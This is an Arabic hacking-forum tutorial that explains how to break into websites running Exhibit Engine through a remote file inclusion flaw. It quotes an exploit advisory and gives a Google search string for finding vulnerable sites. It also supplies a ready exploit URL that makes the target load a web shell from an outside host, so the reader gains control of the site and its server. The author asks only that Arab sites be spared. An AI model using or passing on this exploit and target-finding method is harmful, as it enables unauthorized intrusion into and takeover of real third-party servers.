شرح اختراق مواقع عن طريق Exhibit Engine

[al3ndleeb]

مرحبا احباء اول شرح ليا اليوم اختراق المواقع عن طريق ثغره Exhibit Engine موجوده في اكبر
المواقع واضخمها الصغره تعتمد اساسا على الشيل اي بمعنى انه نرفع شيل على الموقع وعن طريق
الشل نخترق الموقع كله مع السرفر اللي محجوز عليه الموقع واهم شي يرجى عدم استخدام الثغره
في المواقع العربيه انا بلغة اللهم فشهد الان مع الشرح :

كود:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$ 
$$ 
$$ Exhibit Engine <= 1.22 (toroot) Remote File Include Vulnerability 
$$ Script site: http://photography-on-the.net/ee/ 
$$ 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
$$ 
$$ Find by: Kacper (a.k.a Rahim) 
$$ 
$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl 
$$ 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 
$$ 
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak, 
$$ Adam, DeathSpeed, Drzewko, pepi 
$$ 
$$ Specjal greetz: DragonHeart ;-) 
$$ 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 

Expl: 

http://www.site.com/[ee_path]/styles.php?toroot=[evil_scripts] 

#Pozdro dla wszystkich ;-)

هذه الثغره طبعا في ناس راح يسئلوا العندليب كيف يا عندليب بدنا نستخدم الثغره او بمعنى تاني
كيف استغلال الثغره واكيد العندليب بيساعدكم على استغلال الثغره .

اول نروح لحبيبنا وحبيب الهكر جوجل www.googel.com

ثانيا : نكتب في البحث كلمة ( Powered by Exhibit Engine )

طبعا ماشاء الله حبيبنا جوجل ما راح يقصر معنا راح يعطينا الالف المواقع اللي فيها الثغره وهم شي
عدم الاقتراب على المواقع العربيه لنها كمان مصابه فيها ,

تختار احد المواقع واللي بيكون على شكل هذا :

كود:

www.******.com/gallery

نضيف عليه هذا الكود :

كود:

styles.php?toroot=http://www.kuwaitup.net/uploads/46b95a5f01.gif?cmd

سوف يصبح الكود بعد التعديل هكذا :

كود:

www.*******.com/gallery/styles.php?toroot=http://www.kuwaitup.net/uplo ads/46b95a5f01.gif?cmd

واخير بعد ان تقوموا بعمل الشرح كما هوا دون اي نقصان سوف يعمل معاكم الشيل ويصبح الموقع

والسرفر ملك خاص فيكم واي سؤال انا حاضر تحياتي للجمع